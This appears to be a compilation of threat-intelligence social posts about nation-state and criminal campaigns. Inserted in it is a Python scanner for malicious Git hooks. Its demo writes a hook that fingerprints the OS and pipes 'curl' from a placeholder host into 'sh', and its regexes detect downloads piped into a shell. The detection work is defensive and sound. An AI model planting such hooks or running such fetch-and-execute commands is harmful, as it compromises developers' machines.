Coruna iOS Exploit kit is one of those stories where the more you dig the weirder it gets. I love it.
Started as surveillance vendor tooling, ended up in mass Chinese crypto scams, and this week someone registered Iran war-themed dropper domains.
Full timeline thread. 🧵
STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus
Google Threat Intelligence Group
GTIG has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla
https://t.co/ZAnLVXF05T
@googlecloud
New from our team at GTIG: #UNC6240 is back to targeting educational institutions in a new data theft extortion campaign. The activity targets Oracle's #PeopleSoft by exploiting Zero-Day CVE-2026-35273. Disable EMHub and check our blog for guidance.
https://t.co/5qhbKM7i6P
Excellent vid on running down mystery GPS/GNSS signals over Europe. The collection and pivoting tradecraft here is brilliant. I don't think any of us in the cyber domain will be surprised by the results, but an exciting process nonetheless.
https://t.co/k83hPxPngM
New Signals & Stories episode with @TomHegel from @SentinelOne and @invisig0th from The Vertex Project.
We discuss:
🔹DPRK IT workers posing as job applicants
🔹Cross-functional intelligence sharing
🔹AI in CTI
🔹And more!
Really fun conversation on where CTI is headed.
#CyberSecurity #CTI #ThreatIntelligence
https://t.co/VznXxSYEJX
This is a very important story on a recent evolution in tradecraft in Russian active measures, by @Martinlaineolen and team. I have also seen the full original leak, a few additional observations later today https://t.co/awiqQRp6fN
DPRK’s Contagious Interview campaign has a new trick, Git hooks.
Alongside the VSCode tasks.json abuse we've documented in the past, threat actors are hiding malicious scripts in .git/hooks/post-checkout and .githooks/pre-commit, shell scripts that run automatically on checkout or commit.
The hook fingerprints the OS via uname -s, then curls or wgets a per-platform payload from a Vercel domain straight into a shell.
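As an added defender-side example (my code, not part of the post above or of any project it mentions), here is a small scanner that walks a repository's hook directories and flags the two behaviours the post names: host fingerprinting with `uname -s` and a `curl`/`wget` download piped straight into a shell. The hook directory list, the regexes, the sample hooks and the `example.invalid` placeholder domain are all constructed for the demo; real hooks should be reviewed by hand once flagged.

```python
"""Flag Git hooks that fingerprint the host and pipe a download into a shell.

Added example: directory names, indicator regexes and the sample repository
built by build_demo_repo() are constructed assumptions, not data from the post.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Git's default hook directory plus the common core.hooksPath choice named in the post.
HOOK_DIRS = (".git/hooks", ".githooks")

# (regex, description): any hook line matching a regex produces one finding.
INDICATORS = (
    (re.compile(r"\buname\s+-s\b"), "OS fingerprint via uname -s"),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"), "download piped into a shell"),
    (re.compile(r"\b(curl|wget)\b.*https?://"), "network fetch from a hook"),
)


def scan_hooks(repo: str) -> List[Dict[str, object]]:
    """Return one finding per (hook line, indicator) hit under the repo's hook dirs.

    The *.sample files Git ships are skipped because Git never executes them;
    every other regular file is scanned regardless of its executable bit, since an
    attacker can flip that bit at any time after the file lands in the checkout.
    """
    findings: List[Dict[str, object]] = []
    for rel in HOOK_DIRS:
        hook_dir = Path(repo) / rel
        if not hook_dir.is_dir():
            continue
        for hook in sorted(hook_dir.iterdir()):
            if hook.suffix == ".sample" or not hook.is_file():
                continue
            text = hook.read_text(errors="replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                for pattern, why in INDICATORS:
                    if pattern.search(line):
                        findings.append({
                            "hook": str(hook.relative_to(repo)),
                            "line": lineno,
                            "why": why,
                            "text": line.strip(),
                        })
    return findings


def build_demo_repo(root: str) -> str:
    """Create a constructed repository with one benign and one suspicious hook."""
    hooks = Path(root) / ".git" / "hooks"
    hooks.mkdir(parents=True)
    # Shipped sample: mentions uname but Git ignores *.sample, so it must not be reported.
    (hooks / "pre-commit.sample").write_text("#!/bin/sh\nuname -s\n")
    # Benign hook: runs a linter, no network, no fingerprinting.
    (hooks / "pre-commit").write_text("#!/bin/sh\nexec npx eslint --quiet .\n")
    # Constructed stand-in for the post-checkout hook shape described in the post;
    # example.invalid is a reserved placeholder domain, not a real payload host.
    (hooks / "post-checkout").write_text(
        "#!/bin/sh\n"
        "OS=$(uname -s)\n"
        "curl -fsSL https://example.invalid/$OS.sh | sh\n"
    )
    for name in ("pre-commit", "post-checkout"):
        os.chmod(hooks / name, 0o755)
    return root


def demo() -> List[Dict[str, object]]:
    """Build the constructed repo in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_repo(tmp)
        return scan_hooks(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['hook']}:{f['line']}  {f['why']}  -> {f['text']}")
```

Run it against a real checkout with `scan_hooks("/path/to/repo")`; the constructed demo reports three findings, all from `post-checkout`, and nothing for the linter hook or the shipped `.sample` file. The regexes are deliberately coarse: the goal is a short list for a human to read, not an authoritative verdict.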
Another quality technical blog from #MIRAGE, this time on Secret Blizzard’s beloved #Kazuar malware. This blog is an in-depth analysis of Kazuar’s progression from a single, monolithic framework into a modular bot ecosystem composed of three distinct module types, each with clearly defined roles. Together, these components distribute functionality across the P2P botnet, enabling flexible configuration, lower observability, and broad tasking while minimizing opportunities for detection.
https://t.co/0VzspKN1Wa
A leak has provided an unprecedented glimpse into the internal operations of the ransomware-as-a-service group known as "The Gentlemen". The group operated with a relatively small core team and recruited technical affiliates. Operators communicated via Tox protocol in addition to the https://t.co/ODFDj27TXD. The primary initial access vector across all confirmed intrusions was CVE-2024-55591, a pre-authentication bypass in FortiOS/FortiProxy affecting the HTTPS management interface and SSL-VPN. In some rare cases, the group obtained valid Okta credentials from commercial infostealer log markets, bypassing VPN/perimeter controls entirely. VERY cool report:
In my estimation, defenders (of organizations) have roughly 1 year before attackers have 10-100x'd their capabilities at vulnerability discovery and exploitation.
While top-tier projects such as Linux, Chrome, Firefox can remediate this volume of vulnerabilities, not all can.
A newly decoded piece of sabotage malware called Fast16, created before Stuxnet, was made to silently tamper with calculations in research and engineering software. Likely created by the US or an ally, and possibly used against Iran's nuclear program. https://t.co/jE045ejq6u
Fresh research from the team (@vkamluk / @juanandres_gs) - this one goes back quite a while!
fast16 | Mystery ShadowBrokers Reference Reveals High-Precision Software Sabotage 5 Years Before Stuxnet
https://t.co/cR83vHEzWo
Glad to see ORB Networks getting the attention they deserve
Using @TeamCymru’s NetFlow, you can gather statistics about the number of ORBs currently deployed around the world on a daily basis 🌍👇
1. https://t.co/0Km3BAJEDN
2. https://t.co/ztPxyMmJN2
3. https://t.co/wfq2SkEspB
New book coming next year. Working title, THE GRAYSCALE: True Stories of Hackers, Outlaws and Rogues From the Digital Underground.
Thanks to @WIRED, @mitpress and my agent @EricLupfer for making this one possible!
This comment from @tanuki42_ is really what's catching my eye here:
"... recruited facilitators to go and meet specific people who worked for the company irl at major crypto conferences, built relationships over 6 months then dropped malware on them"
Multiple in person meet ups